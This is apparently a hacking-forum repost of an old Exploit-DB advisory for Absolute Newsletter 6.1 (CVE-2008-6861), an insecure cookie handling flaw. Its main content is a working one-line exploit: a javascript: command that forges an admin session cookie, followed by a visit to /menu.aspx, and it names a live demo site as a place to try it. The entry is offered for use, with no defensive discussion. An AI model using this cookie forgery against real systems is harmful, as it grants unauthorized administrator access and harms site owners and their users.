Exploit Absolute NewsLetter 6.1 - Insecure Cookie Handling

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6904
Проверка EDB
  1. Пройдено
Автор
X0R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6861
Дата публикации
2008-10-31
Код:
-=======================================-
Autore: x0r
Cms = Absolute Newsletter 6.1
Bug: Insecure Cookie Handling Vulnerability
-=======================================-


Exploit:
javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE
A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/"; and go to
/menu.aspx

Live Demo: http://www.xigla.com/absolutenl/demo

[-] King Lion Gay
[+] Margherita Ti Amo...I'm Sorry...

_EOF_

# milw0rm.com [2008-10-31]
 
Источник
www.exploit-db.com

Похожие темы